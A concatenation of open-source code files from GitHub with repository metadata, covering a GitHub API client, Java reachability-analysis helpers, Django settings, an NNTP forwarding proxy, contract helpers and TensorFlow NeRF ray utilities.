                    links = link_header.parse(link_header_value)
                    links_dict = {link.rel: link.href for link in links.links}
                return await response.json(), self._last_limits, links_dict

    async def get_relative_url(self, url, is_paginated=False) -> tuple:
        return await self.get_absolute_url(self._base_url + '/' + url,
                                           is_paginated=is_paginated)

    async def get_url(self, url: str, relative: bool, is_paginated=False) -> \
            tuple:
        if relative:
            return await self.get_relative_url(url, is_paginated)
        else:
            return await self.get_absolute_url(url, is_paginated)

    def get_list_relative_url(self, path, element_type,
                              fetch_params=None):
        return self.get_list_absolute_url(self._base_url + '/' + path,
                                          element_type,
                                          fetch_params=fetch_params)

    def get_list_absolute_url(self, url, element_type,
                              fetch_params=None):
        return response.PaginatedListProxy(
            self, url, element_type, fetch_params
        )

    async def _get_object_relative_url(self, element_type,
                                       defer_fetch=False,
                                       fetch_params=None):
        # Build the object shell; fetch its data now unless deferred.
        element = element_type(self, fetch_params=fetch_params)
        if not defer_fetch:
            await element.fetch_data()
        return element
| {
"content_hash": "36c03b8e17ab995ca489be66f8ea1a1f",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 79,
"avg_line_length": 37.016,
"alnum_prop": 0.5446293494704992,
"repo_name": "reupen/aiogithub",
"id": "2086532182845328d5945e10a19e6cc378c3faa3",
"size": "9254",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aiogithub/aiogithub.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "64214"
}
],
"symlink_target": ""
} |
from collections import defaultdict
from . import core # noqa F401
from .core import ReachableObjectType
"""
Just a kitchen sink of methods that may be useful when analyzing the
reachability graph. We may want to refine / prune this file in the future.
"""
def classify_nodes(nodes):
    """
    Return a summary count of the number of each kind of node.
    """
    counts = defaultdict(int)
    for node in nodes:
        kind = ReachableObjectType.to_string(node.type)
        counts[kind] += 1
    return counts
def group_by_common_keys(d):
    """
    Group the keys of :d by shared values.

    The input :d should be a dict whose values are sets. Given
        k1 -> {v1, v2, v3}
        k2 -> {v1, v2}
        k3 -> {v1, v2}
    the output is
        frozenset({k1, k2, k3}) -> {v1, v2}
        frozenset({k1}) -> {v3}
    Useful for finding keep rules whose matched classes overlap a lot.
    """
    # Invert: each value -> the set of keys whose value-set contains it.
    keys_for_value = defaultdict(set)
    for key, values in d.items():
        for value in values:
            keys_for_value[value].add(key)
    # Re-group: values sharing the same key set collapse into one entry.
    grouped = defaultdict(set)
    for value, keys in keys_for_value.items():
        grouped[frozenset(keys)].add(value)
    return grouped
def find_nodes(graph, filter_fn):
    """
    Find all nodes whose names pass the predicate :filter_fn.
    """
    return {node for node in graph.nodes.values() if filter_fn(node.name)}
def find_nodes_in_packages(graph, pkg_prefixes):
    """
    Find all nodes that fall under the list of :pkg_prefixes.
    """
    prefixes = tuple(pkg_prefixes)
    matches = set()
    for node in graph.nodes.values():
        # If we have an array type, compare against its base type.
        base_type = node.name.lstrip("[")
        if base_type.startswith(prefixes):
            matches.add(node)
    return matches
def find_boundary(graph, query_set):
    """
    Find all the nodes that retain (i.e. point into) :query_set.

    Annotation nodes are looked through: rather than reporting an annotation
    as a retainer, we continue to *its* retainers, since e.g.
        @JsonSerialize(Foo.class)
        public Foo { ... }
    should not make JsonSerialize count as a retainer of Foo.

    Return a dictionary of
        <retaining node> -> <set of retained nodes>
    where the retained nodes are the immediate successors of the retaining
    node that lie inside :query_set.
    """
    boundary = defaultdict(set)
    worklist = set(query_set)
    seen = set()
    while worklist:
        node = worklist.pop()
        if node in seen:
            continue
        seen.add(node)
        for pred in node.preds:
            if pred in query_set:
                continue
            if pred.type == ReachableObjectType.ANNO:
                # Look through the annotation to its own retainers.
                worklist.add(pred)
            else:
                boundary[pred].add(node)
    return boundary
def group_members_by_class(graph):
    """
    Return a map of class -> set of members in that class.
    """
    members_of = defaultdict(set)
    for (node_type, name), node in graph.nodes.items():
        if node_type not in (ReachableObjectType.FIELD,
                             ReachableObjectType.METHOD):
            continue
        # Member names look like "Lcls;.member"; recover the class name.
        cls_name = name.partition(";")[0] + ";"
        try:
            cls_node = graph.get_node(cls_name)
        except KeyError:
            # The member's class is not present in the graph; skip it.
            continue
        members_of[cls_node].add(node)
    return members_of
def find_package_references(graph, pkg_prefixes):
    """
    Find all nodes that retain classes under the list of :pkg_prefixes.
    """
    targets = find_nodes_in_packages(graph, pkg_prefixes)
    return find_boundary(graph, targets)
def get_dominated(graph, query_set):
    """
    Find all nodes in the graph that cannot be reached from a root without
    passing through :query_set.
    """
    # Iterative DFS from every root, refusing to enter :query_set.
    reachable = set()
    stack = [node for node in graph.nodes.values() if len(node.preds) == 0]
    while stack:
        node = stack.pop()
        if node in reachable or node in query_set:
            continue
        reachable.add(node)
        stack.extend(node.succs)
    # Whatever was never reached is dominated by the query set.
    return {node for node in graph.nodes.values() if node not in reachable}
class Ranker(object):
    """
    Rank leak roots by how much leaked code they retain.

    Each root receives a weighted count of the leaked nodes reachable from
    it; a node reachable from N roots contributes 1/N of its weight to each
    of those roots. This is similar to the LeakShare metric described in
    "BLeak: Automatically Debugging Memory Leaks in Web Applications" by
    Vilk and Berger.

    While calculating the ranking, we also record the set of leaked nodes
    dominated by each root, i.e. the set of nodes only reachable via that
    root.
    """
    def __init__(self, roots, leaked_set):
        self.counts = defaultdict(int)
        self.leaked_set = leaked_set
        for root in roots:
            self.mark(root)

    def mark(self, root):
        """
        Increment self.counts[node] for every leaked node reachable from
        :root, so each count ends up as the number of roots reaching it.
        """
        seen = set()

        def traverse(node):
            if node in seen or node not in self.leaked_set:
                return
            seen.add(node)
            self.counts[node] += 1
            for successor in node.succs:
                traverse(successor)

        for successor in root.succs:
            traverse(successor)

    def get_rank(self, root):
        """
        Return (score, dominated) for :root. Each reachable leaked method
        contributes 1/N to the score, N being the number of roots that can
        reach it; `dominated` collects the nodes only this root reaches.
        """
        score = 0.0
        dominated = set()
        seen = set()

        def traverse(node):
            nonlocal score
            if node in seen or node not in self.leaked_set:
                return
            seen.add(node)
            if self.counts[node] == 1:
                dominated.add(node)
            if node.type == ReachableObjectType.METHOD:
                score += 1.0 / self.counts[node]
            for successor in node.succs:
                traverse(successor)

        for successor in root.succs:
            traverse(successor)
        return (score, dominated)
def rank(roots, leaked_set):
    """Return (root, (score, dominated)) pairs sorted by descending score."""
    ranker = Ranker(roots, leaked_set)
    scored = [(root, ranker.get_rank(root)) for root in roots]
    scored.sort(key=lambda pair: pair[1][0], reverse=True)
    return scored
| {
"content_hash": "0737755639ae0e7bda36bb7003ed441f",
"timestamp": "",
"source": "github",
"line_count": 235,
"max_line_length": 81,
"avg_line_length": 28.23404255319149,
"alnum_prop": 0.5987942727957799,
"repo_name": "facebook/redex",
"id": "afdf4909785691e84907c80a54f77823ec36bcbf",
"size": "6838",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tools/reachability-analysis/lib/analysis.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "1855"
},
{
"name": "C",
"bytes": "45691"
},
{
"name": "C++",
"bytes": "10822879"
},
{
"name": "CMake",
"bytes": "36765"
},
{
"name": "CSS",
"bytes": "2259"
},
{
"name": "Dockerfile",
"bytes": "232"
},
{
"name": "Java",
"bytes": "663048"
},
{
"name": "JavaScript",
"bytes": "12077"
},
{
"name": "Kotlin",
"bytes": "20642"
},
{
"name": "M4",
"bytes": "64700"
},
{
"name": "Makefile",
"bytes": "50587"
},
{
"name": "Perl",
"bytes": "1532"
},
{
"name": "Python",
"bytes": "494966"
},
{
"name": "Rust",
"bytes": "192507"
},
{
"name": "Shell",
"bytes": "25367"
}
],
"symlink_target": ""
} |
from django.contrib.admin.apps import SimpleAdminConfig
class MyCustomAdminConfig(SimpleAdminConfig):
    """Admin app config that installs a custom default admin site class."""
    verbose_name = "My custom default admin site."
    # Dotted path to the AdminSite subclass Django should use as default.
    default_site = "admin_default_site.sites.CustomAdminSite"
| {
"content_hash": "82d71e47d925c7d114bac2dd96c9ff06",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 61,
"avg_line_length": 36.166666666666664,
"alnum_prop": 0.7926267281105991,
"repo_name": "takis/django",
"id": "d2dde8784f0bedafd85a5532583161cf6b3700fb",
"size": "217",
"binary": false,
"copies": "17",
"ref": "refs/heads/master",
"path": "tests/admin_default_site/apps.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "91756"
},
{
"name": "HTML",
"bytes": "238967"
},
{
"name": "JavaScript",
"bytes": "157514"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Procfile",
"bytes": "47"
},
{
"name": "Python",
"bytes": "16141182"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "392"
}
],
"symlink_target": ""
} |
import nntplib
import re
import time
import StringIO
# We need setting.forward_host, which is the nntp server we forward to
import papercut.settings
settings = papercut.settings.CONF()
# This is an additional backend for Papercut, currently it's more or less proof-of-concept.
# It's a "forwarding proxy", that merely forwards all requests to a "real" NNTP server.
# Just for fun, the post command adds an additional header.
#
# Written by Gerhard Häring (gerhard@bigfoot.de)
def log(s):
    """Debug logging helper (Python 2 print statement)."""
    # For debugging, replace with "pass" if this gets stable one day
    print s
class Papercut_Storage:
    """Forwarding-proxy storage backend for Papercut.

    Every NNTP command is delegated to the upstream server named by
    ``settings.forward_host``; ``do_POST`` additionally injects an
    ``X-Modified-By`` header. This module is Python 2 code (print
    statements, ``except Exc, name`` syntax) and explicitly proof-of-concept.
    """
    def __init__(self):
        # Single persistent connection to the upstream NNTP server.
        self.nntp = nntplib.NNTP(settings.forward_host)
    def group_exists(self, group_name):
        """Return 1 if the upstream server carries :group_name, else 0."""
        try:
            self.nntp.group(group_name)
        except nntplib.NNTPTemporaryError, reason:
            return 0
        return 1
    def get_first_article(self, group_name):
        """Stub: always reports article 1 as the first article."""
        log(">get_first_article")
        # Not implemented
        return 1
    def get_group_stats(self, container):
        """Derive (total, maximum, minimum) from a (max, min) pair."""
        # log(">get_group_stats")
        # Returns: (total, maximum, minimum)
        # NOTE: locally shadows the max/min builtins.
        max, min = container
        return (max-min, max, min)
    def get_message_id(self, msg_num, group):
        """Build a synthetic message-id of the form <num@group>."""
        return '<%s@%s>' % (msg_num, group)
    def get_NEWGROUPS(self, ts, group='%'):
        """NEWGROUPS command: list groups created after timestamp :ts."""
        log(">get_NEWGROUPS")
        date = time.strftime("%y%m%d", ts)
        tim = time.strftime("%H%M%S", ts)
        response, groups = self.nntp.newgroups(date, tim)
        # NOTE(review): this returns the constant "1\r\n2\r\n3" and discards
        # `groups` -- looks like leftover debug/stub code.
        return "\r\n".join(["%s" % k for k in (1,2,3)])
    def get_NEWNEWS(self, ts, group='*'):
        """NEWNEWS command (stubbed)."""
        log(">get_NEWNEWS")
        articles = []
        # NOTE(review): `id` here is the Python builtin function, not an
        # article id, so this produces a bogus entry -- presumably stub code.
        articles.append("<%s@%s>" % (id, group))
        if len(articles) == 0:
            return ''
        else:
            return "\r\n".join(articles)
    def get_GROUP(self, group_name):
        """GROUP command: select a group upstream."""
        # Returns: (total, first_id, last_id)
        log(">get_GROUP")
        response, count, first, last, name = self.nntp.group(group_name)
        return (count, first, last)
    def get_LIST(self, username=""):
        """LIST command: all groups with their article number ranges."""
        # Returns: list of (groupname, table)
        log(">get_LIST")
        response, lst= self.nntp.list()
        def convert(x):
            # Upstream rows are (group, last, first, flag) strings;
            # convert to (group, (last, first)) with integer bounds.
            return x[0], (int(x[1]), int(x[2]))
        lst = map(convert, lst)
        return lst
    def get_STAT(self, group_name, id):
        """STAT command: article number for :id, or None if unknown."""
        log(">get_STAT")
        try:
            resp, nr, id = self.nntp.stat(id)
            return nr
        except nntplib.NNTPTemporaryError, reason:
            return None
    def get_ARTICLE(self, group_name, id):
        """Return (headers, body): fetches head and full article, then strips
        the leading header block (up to the first blank line) from the body."""
        log(">get_ARTICLE")
        resp, nr, id, headerlines = self.nntp.head(id)
        resp, nr, id, articlelines = self.nntp.article(id)
        dobreak = 0
        while 1:
            if articlelines[0] == "":
                # Blank separator found: drop it, then stop.
                dobreak = 1
            del articlelines[0]
            if dobreak:
                break
        return ("\r\n".join(headerlines), "\n".join(articlelines))
    def get_LAST(self, group_name, current_id):
        """LAST command (not supported by this backend)."""
        log(">get_LAST")
        # Not implemented
        return None
    def get_NEXT(self, group_name, current_id):
        """NEXT command (not supported by this backend)."""
        log(">get_NEXT")
        # Not implemented
        return None
    def get_HEAD(self, group_name, id):
        """HEAD command: raw header lines for article :id."""
        log(">get_HEAD")
        resp, nr, mid, headerlines = self.nntp.head(id)
        return "\r\n".join(headerlines)
    def get_BODY(self, group_name, id):
        """BODY command: raw body lines for article :id."""
        log(">get_BODY")
        resp, nr, mid, bodylines = self.nntp.body(id)
        return "\r\n".join(bodylines)
    def get_XOVER(self, group_name, start_id, end_id='ggg'):
        """XOVER command: tab-separated overview rows for a range."""
        # subject\tauthor\tdate\tmessage-id\treferences\tbyte count\tline count\r\n
        log(">get_XOVER")
        xov = list(self.nntp.xover(start_id, end_id)[1])
        nxov = []
        for entry in xov:
            entry = list(entry)
            # The references field arrives as a list; flatten before joining.
            entry[5] = "\n".join(entry[5])
            nxov.append("\t".join(entry))
        return "\r\n".join(nxov)
    def get_LIST_ACTIVE(self, pat):
        """LIST ACTIVE command, forwarded verbatim with pattern :pat."""
        log(">get_LIST_ACTIVE")
        # NOTE: local name `list` shadows the builtin.
        resp, list = self.nntp.longcmd('LIST ACTIVE %s' % pat)
        return list
    def get_XPAT(self, group_name, header, pattern, start_id, end_id='ggg'):
        """XPAT command (not supported by this backend)."""
        log(">get_XPAT")
        return None
    def get_LISTGROUP(self, group_name=""):
        """LISTGROUP command: article numbers in the group, one per line."""
        log(">get_LISTGROUP")
        ids = []
        self.nntp.putcmd("LISTGROUP %s" % group_name)
        # Read raw response lines until the "." terminator.
        while 1:
            curline = self.nntp.getline()
            if curline == ".":
                break
            ids.append(curline)
        return "\r\n".join(ids)
    def get_XGTITLE(self, pattern="*"):
        """XGTITLE command: group descriptions matching :pattern."""
        log(">get_XGTITLE")
        resp, result = self.nntp.xgtitle(pattern)
        return "\r\n".join(["%s %s" % (group, title) for group, title in result])
    def get_XHDR(self, group_name, header, style, range):
        """XHDR command: header values for an id or an id range."""
        # NOTE: parameter `range` shadows the builtin.
        log(">get_XHDR")
        if style == "range":
            range = "-".join(range)
        resp, result = self.nntp.xhdr(header, range)
        result = map(lambda x: x[1], result)
        return "\r\n".join(result)
    def do_POST(self, group_name, lines, ip_address, username=''):
        """Forward a posted article upstream, adding an X-Modified-By header."""
        log(">do_POST")
        # Normalize line endings to bare \n. NOTE(review): the `> 0` guard
        # would skip a \r at index 0, though replace() removes all in one pass.
        while lines.find("\r") > 0:
            lines = lines.replace("\r", "")
        lns = lines.split("\n")
        counter = 0
        # Insert the extra header just before the blank header/body separator.
        for l in lns:
            if l == "":
                lns.insert(counter, "X-Modified-By: Papercut's forwarding backend")
                break
            counter +=1
        lines = "\n".join(lns)
        # we need to send an actual file
        f = StringIO.StringIO(lines)
        result = self.nntp.post(f)
        return result
| {
"content_hash": "f4c5fe38e46263d13b317b5955598175",
"timestamp": "",
"source": "github",
"line_count": 177,
"max_line_length": 91,
"avg_line_length": 31.463276836158194,
"alnum_prop": 0.5514455018854373,
"repo_name": "jgrassler/papercut",
"id": "6fa5f4858fa5b3bbcb189eff470c4b25670c2e09",
"size": "5570",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "papercut/storage/forwarding_proxy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "248023"
},
{
"name": "Shell",
"bytes": "1892"
}
],
"symlink_target": ""
} |
# Pull in the App Engine base settings when djangoappengine is available;
# fall back gracefully so the project still loads in a plain Django setup.
try:
    from djangoappengine.settings_base import *
    has_djangoappengine = True
except ImportError:
    has_djangoappengine = False
# NOTE(review): DEBUG should be disabled for production deployments.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
import os
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Activate django-dbindexer for the default database: keep the real backend
# reachable under the 'native' alias and route 'default' through dbindexer.
DATABASES['native'] = DATABASES['default']
DATABASES['default'] = {'ENGINE': 'dbindexer', 'TARGET': 'native'}
AUTOLOAD_SITECONF = 'indexes'
# NOTE(review): a hard-coded SECRET_KEY in source control is a security
# risk; consider loading it from the environment instead.
SECRET_KEY = '=r-$b*8hglm+858&9t043hlm6-&6-3d3vfc4((7yd0dbrakhvi'
INSTALLED_APPS = (
    'django.contrib.contenttypes',
    'django.contrib.auth',
    'django.contrib.sessions',
    #'django.contrib.admin',
    'django.contrib.markup',
    'djangotoolbox',
    'autoload',
    'dbindexer',
    'blog',
    # djangoappengine should come last, so it can override a few manage.py commands
    'djangoappengine',
)
MIDDLEWARE_CLASSES = (
    # This loads the index definitions, so it has to come first
    'autoload.middleware.AutoloadMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
    'django.contrib.auth.context_processors.auth',
    'django.core.context_processors.request',
    'django.core.context_processors.media',
    'django.core.context_processors.static',
)
# This test runner captures stdout and associates tracebacks with their
# corresponding output. Helps a lot with print-debugging.
TEST_RUNNER = 'djangotoolbox.test.CapturingTestSuiteRunner'
ADMIN_MEDIA_PREFIX = '/media/admin/'
# Media and template paths are resolved relative to this settings file.
MEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media')
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), 'templates'),)
LOGIN_URL = '/login/'
LOGOUT_URL = '/logout/'
LOGIN_REDIRECT_URL = '/'
ROOT_URLCONF = 'urls'
| {
"content_hash": "6196715927aaf6586f58ebbf262c04c8",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 83,
"avg_line_length": 31.041666666666668,
"alnum_prop": 0.7261744966442953,
"repo_name": "DJMelonz/basic-blog",
"id": "7b807d43ee757e33ccd2df168237af2af9004557",
"size": "2235",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "133071"
},
{
"name": "Python",
"bytes": "4389459"
},
{
"name": "Ruby",
"bytes": "913"
}
],
"symlink_target": ""
} |
from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
class ObjectServerAI(DistributedObjectAI):
    """AI-side distributed object; the setters are unimplemented placeholders."""
    notify = DirectNotifyGlobal.directNotify.newCategory("ObjectServerAI")
    def setName(self, todo0):
        # Stub: name updates are ignored.
        pass
    def setDcHash(self, todo0):
        # Stub: dc-hash updates are ignored.
        pass
    def setDateCreated(self, todo0):
        # Stub: creation-date updates are ignored.
        pass
| {
"content_hash": "76303c16169cdce89b3f0cb90c45cd50",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 74,
"avg_line_length": 25.533333333333335,
"alnum_prop": 0.7519582245430809,
"repo_name": "silly-wacky-3-town-toon/SOURCE-COD",
"id": "cb2c3804f3da2b0527b9ccf4d2fee2bddfe7c8c2",
"size": "383",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "otp/distributed/ObjectServerAI.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10249"
},
{
"name": "C",
"bytes": "1752256"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "5485400"
},
{
"name": "Emacs Lisp",
"bytes": "210083"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "NSIS",
"bytes": "1009050"
},
{
"name": "Objective-C",
"bytes": "21821"
},
{
"name": "PLSQL",
"bytes": "10200"
},
{
"name": "Pascal",
"bytes": "4986"
},
{
"name": "Perl6",
"bytes": "30612"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "33566014"
},
{
"name": "Shell",
"bytes": "14642"
},
{
"name": "Tcl",
"bytes": "2084458"
}
],
"symlink_target": ""
} |
"""
Helpers for reusable contract components.
Now that we have preconditions, postconditions, and invariants, let us provide some abstractions:
1. a "returns" predicate. This is a postcondition that tests the return value.
2. an "args" predicate. This tests the parameters with additional predicates.
3. a "const" predicate. This asserts that self is not mutated (old==self).
Since some of those take additional predicates, some abstractions might be nice:
1. nullable: allows null (or an additional test, passed in, such as nullable(positive)
2. numeric tests: (number, positive, negative)
3. logical tests: (not, and, or) with negative==not(positive), nonzero==or(positive, negative)
4. is_type: some kind of isinstance wrapper
"""
from functools import wraps
def returns(predicate):
    """DBC helper: lift a one-argument predicate into a postcondition that
    checks only the method's return value."""
    @wraps(predicate)
    def check_return_value(s, old, ret, *args, **kwargs):
        return predicate(ret)
    return check_return_value
def state(predicate):
    """DBC helper: lift a one-argument predicate into an object-state test
    usable in both preconditions and postconditions."""
    @wraps(predicate)
    def check_state(s, *args, **kwargs):
        return predicate(s)
    return check_state
def args(*arglist):
    """DBC helper: apply one simple predicate per positional argument, for
    use in preconditions. Arguments beyond the predicate list are ignored."""
    def check_positionals(s, *positionals, **kw):
        return all(pred(value) for pred, value in zip(arglist, positionals))
    return check_positionals
def not_(predicate):
    """DBC helper: logical negation of a reusable predicate."""
    @wraps(predicate)
    def negation(*args, **kwargs):
        return not predicate(*args, **kwargs)
    return negation
def or_(predicate1, predicate2):
    """DBC helper for disjunction of predicates (short-circuits)."""
    def either(*args, **kwargs):
        return predicate1(*args, **kwargs) or predicate2(*args, **kwargs)
    return either
def and_(predicate1, predicate2):
    """DBC helper for conjunction of predicates (short-circuits)."""
    def both(*args, **kwargs):
        return predicate1(*args, **kwargs) and predicate2(*args, **kwargs)
    return both
class argument_types:
    """DBC helper for reusable, simple predicates for argument-type tests used
    in preconditions.

    Types may be given directly or as dotted-name strings resolved relative
    to this module. None arguments are always accepted (nullable semantics).
    After a failed check, error() describes the offending argument.
    """
    def __init__(self, *typelist):
        self.typelist = typelist
        self.msg = "implementation error in argument_types"
    def _str_to_class(self, string):
        # Resolve a dotted name (e.g. "pkg.Cls") via this module's namespace.
        import sys
        from functools import reduce  # Python 3: reduce is not a builtin
        return reduce(getattr, string.split("."), sys.modules[__name__])
    def __call__(self, s, *args, **kwargs):
        for typ, arg in zip(self.typelist, args):
            if isinstance(typ, str):
                # Bug fix: the original returned False when the argument WAS
                # of the resolved type (missing "not"), and then fell through
                # to isinstance(arg, <str>) which raises TypeError.
                if not isinstance(arg, self._str_to_class(typ)) and arg is not None:
                    self.msg = "argument %s was not of type %s" % (arg, typ)
                    return False
            elif not isinstance(arg, typ) and arg is not None:
                self.msg = "argument %s was not of type %s" % (arg, typ.__name__)
                return False
        return True
    def error(self):
        return self.msg
def const(self, old, ret, *args, **kwargs):
    """Object constness was violated by the method call (did you forget to override __eq__?)"""
    # NOTE(review): assumes `old` is a snapshot wrapper exposing the original
    # object as `old.self`; the comparison relies on the class defining __eq__.
    return old.self == self
| {
"content_hash": "c02a32198fbb36a38c1802b3775d4c7e",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 121,
"avg_line_length": 40.71764705882353,
"alnum_prop": 0.6668592892227679,
"repo_name": "ccoakley/dbcbet",
"id": "d5074701792edcce4011994b29541d7b80d1bb26",
"size": "3461",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dbcbet/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "56718"
}
],
"symlink_target": ""
} |
"""Functions for helping running NeRF-based networks."""
import math
import tensorflow as tf
from tensorflow_graphics.geometry.transformation import rotation_matrix_3d
from tensorflow_graphics.util import shape
pi = math.pi
def match_intermediate_batch_dimensions(tensor1, tensor2):
  """Broadcast `tensor1` across the intermediate batch dimensions of `tensor2`.

  Args:
    tensor1: A tensor of shape `[A1, M]`.
    tensor2: A tensor of shape `[A1, ..., An, N]`.

  Returns:
    A tensor of shape `[A1, ..., An, M]`.
  """
  shape.check_static(
      tensor=tensor1,
      tensor_name="tensor1",
      has_rank=2)
  shape.check_static(
      tensor=tensor2,
      tensor_name="tensor2",
      has_rank_greater_than=1)
  shape.compare_dimensions(tensors=(tensor1, tensor2),
                           tensor_names=("tensor1", "tensor2"),
                           axes=0)
  shape1 = tf.shape(tensor1)
  shape2 = tf.shape(tensor2)
  # len() of a tf.shape() result requires the static rank to be known.
  shape_diff = len(shape2) - len(shape1)
  # Insert singleton dims between the leading batch dim and the channel dim:
  # [A1, M] -> [A1, 1, ..., 1, M], then broadcast to [A1, ..., An, M].
  new_shape = tf.concat([[shape1[0]], [1]*shape_diff, [shape1[-1]]], axis=-1)
  target_shape = tf.concat([shape2[:-1], [shape1[-1]]], axis=-1)
  return tf.broadcast_to(tf.reshape(tensor1, new_shape), target_shape)
def change_coordinate_system(points3d,
                             rotations=(0., 0., 0.),
                             scale=(1., 1., 1.),
                             name="change_coordinate_system"):
  """Change coordinate system.

  Args:
    points3d: A tensor of shape `[A1, ..., An, M, 3]` containing the
      3D position of M points.
    rotations: A tuple containing the X, Y, Z axis rotation (Euler angles).
    scale: A tuple containing the X, Y, Z axis scale.
    name: A name for this op. Defaults to "change_coordinate_system".

  Returns:
    A tensor of shape `[A1, ..., An, M, 3]` with the points expressed in the
    rotated and scaled coordinate system.
  """
  with tf.name_scope(name):
    points3d = tf.convert_to_tensor(points3d)
    rotation = tf.convert_to_tensor(rotations)
    scale = tf.convert_to_tensor(scale)
    rotation_matrix = rotation_matrix_3d.from_euler(rotation)
    # Per-axis scaling expressed as a diagonal matrix.
    scaling_matrix = scale*tf.eye(3, 3)
    # Reshape the combined S*R transform so it broadcasts over batch dims.
    target_shape = [1]*(len(points3d.get_shape().as_list())- 2) + [3, 3]
    transformation = tf.matmul(scaling_matrix, rotation_matrix)
    transformation = tf.reshape(transformation, target_shape)
    # Apply to row-vector points via (T p^T)^T.
    return tf.linalg.matrix_transpose(
        tf.matmul(transformation, tf.linalg.matrix_transpose(points3d)))
@tf.function
def get_distances_between_points(ray_points3d, last_bin_width=1e10):
  """Estimates the distance between points in a ray.

  Args:
    ray_points3d: A tensor of shape `[A1, ..., An, M, 3]`,
      where M is the number of points in a ray.
    last_bin_width: A scalar indicating the width of the last bin.

  Returns:
    A tensor of shape `[A1, ..., An, M]` containing the distances between
    the M points, with the distance of the last element set to a high value.
  """
  shape.check_static(
      tensor=ray_points3d,
      tensor_name="ray_points3d",
      has_dim_equals=(-1, 3))
  shape.check_static(
      tensor=ray_points3d,
      tensor_name="ray_points3d",
      has_rank_greater_than=1)
  # Euclidean distance between each pair of consecutive samples (M-1 values).
  dists = tf.norm(ray_points3d[..., 1:, :] - ray_points3d[..., :-1, :], axis=-1)
  if last_bin_width > 0.0:
    # Append a very wide final bin so the output keeps M entries per ray.
    dists = tf.concat([dists, tf.broadcast_to([last_bin_width],
                                              dists[..., :1].shape)], axis=-1)
  return dists
@tf.function
def _move_in_front_of_camera(points3d,
                             rotation_matrix,
                             translation_vector):
  """Moves a set of points in front of a camera given by its extrinsics.

  Args:
    points3d: A tensor of shape `[A1, ..., An, M, 3]`,
      where M is the number of points.
    rotation_matrix: A tensor of shape `[A1, ..., An, 3, 3]`.
    translation_vector: A tensor of shape `[A1, ..., An, 3, 1]`.

  Returns:
    A tensor of shape `[A1, ..., An, M, 3]`.
  """
  points3d = tf.convert_to_tensor(value=points3d)
  rotation_matrix = tf.convert_to_tensor(value=rotation_matrix)
  translation_vector = tf.convert_to_tensor(value=translation_vector)
  shape.check_static(
      tensor=points3d, tensor_name="points3d", has_dim_equals=(-1, 3))
  shape.check_static(
      tensor=rotation_matrix,
      tensor_name="rotation_matrix",
      has_dim_equals=(-1, 3))
  shape.check_static(
      tensor=rotation_matrix,
      tensor_name="rotation_matrix",
      has_dim_equals=(-2, 3))
  shape.check_static(
      tensor=translation_vector,
      tensor_name="translation_vector",
      has_dim_equals=(-1, 1))
  shape.check_static(
      tensor=translation_vector,
      tensor_name="translation_vector",
      has_dim_equals=(-2, 3))
  shape.compare_batch_dimensions(
      tensors=(points3d, rotation_matrix, translation_vector),
      tensor_names=("points3d", "rotation_matrix", "translation_vector"),
      last_axes=-3,
      broadcast_compatible=True)
  # Translate column-vector points: p' = p^T + t.
  points3d_corrected = tf.linalg.matrix_transpose(points3d) + translation_vector
  # NOTE(review): the transpose of R is negated here, which is unusual for a
  # plain extrinsics inversion -- presumably this project's sign convention.
  # Confirm against the camera conventions used by the callers.
  rotation_matrix_t = -tf.linalg.matrix_transpose(rotation_matrix)
  points3d_world = tf.matmul(rotation_matrix_t, points3d_corrected)
  return tf.linalg.matrix_transpose(points3d_world)
@tf.function
def camera_rays_from_extrinsics(rays,
                                rotation_matrix,
                                translation_vector):
  """Transform the rays from a camera located at (0, 0, 0) to ray origins and directions for a camera with given extrinsics.

  Args:
    rays: A tensor of shape `[A1, ..., An, N, 3]` where N is the number of rays.
    rotation_matrix: A tensor of shape `[A1, ..., An, 3, 3]`.
    translation_vector: A tensor of shape `[A1, ..., An, 3, 1]`.

  Returns:
    A tensor of shape `[A1, ..., An, N, 3]` representing the ray origin and
